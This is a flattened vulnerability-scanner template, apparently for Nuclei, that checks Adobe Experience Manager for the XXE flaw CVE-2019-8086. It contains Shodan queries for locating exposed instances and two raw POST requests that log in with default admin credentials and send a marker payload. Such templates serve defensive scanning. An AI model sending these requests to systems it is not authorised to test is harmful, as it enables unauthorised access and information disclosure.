id: CVE-2019-8086 info: name: Adobe Experience Manager XXE author: DhiyaneshDk severity: high description: Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure. reference: - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-8086 cwe-id: CWE-611 metadata: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: cve,cve2019,aem,adobe requests: - raw: - | POST /content/{{randstr}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic YWRtaW46YWRtaW4= Referer: {{BaseURL}} sling:resourceType=fd/af/components/guideContainer - | POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic YWRtaW46YWRtaW4= Referer: {{BaseURL}} guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"\u0041\u0042\u0043"}}} matchers-condition: and matchers: - type: word part: body words: - 'ABC' - type: word part: header words: - application/json - type: status status: - 200